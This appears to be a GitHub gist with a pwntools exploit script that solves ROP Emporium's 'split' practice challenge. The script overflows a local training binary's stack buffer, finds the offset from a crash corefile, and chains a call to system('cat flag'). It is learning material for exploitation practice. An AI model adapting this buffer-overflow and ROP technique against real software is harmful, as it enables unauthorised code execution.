Skip to content

Instantly share code, notes, and snippets.

@zachriggle zachriggle/win.py
Created Sep 25, 2017

Embed
What would you like to do?
Exploit for ROP Emporium's "split"
from pwn import *
# Set up pwntools to work with this binary
elf = context.binary = ELF('split')
# We need to invoke system("cat flag"), which requires knowing the
# location of both the function 'system' as well as the string 'cat flag'.
system = elf.symbols.system
cat_flag = elf.search("cat flag").next()
info("%#x system", system)
info("%#x cat flag", cat_flag)
# We need to ROP to call system().
#
# For 32-bit, we just need to set up the stack correctly.
# For 64-bit, we need to load the address of cat_flag into
# the register RDI.
#
# Luckily, pwntools knows all about this and handles it for us.
rop = ROP(elf)
rop.system(cat_flag)
info(rop.dump())
# Again, we will automatically discover the offset with a cyclic pattern.
#
#==============================================================================
# DISCOVER OFFSETS AUTOMATICALLY
#==============================================================================
# Figure out how big of an overflow we need by crashing the
# process once.
io = process(elf.path)
# We will send a 'cyclic' pattern which overwrites the return
# address on the stack. The value 128 is longer than the buffer.
io.sendline(cyclic(128))
# Wait for the process to crash
io.wait()
# Open up the corefile
core = io.corefile
# Extract the faulting address, which should contain our cyclic pattern
fault = core.fault_addr
info("%r fault", fault)
#==============================================================================
# END OFFSET DISCOVERY
#==============================================================================
# Craft a new payload which puts the ROP stack at the correct offset
payload = fit({
fault: str(rop)
})
# Send the payload to a new copy of the process
io = process(elf.path)
io.recvuntil("> ")
io.sendline(payload)
# Get our flag!
flag = io.recvline()
success(flag)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.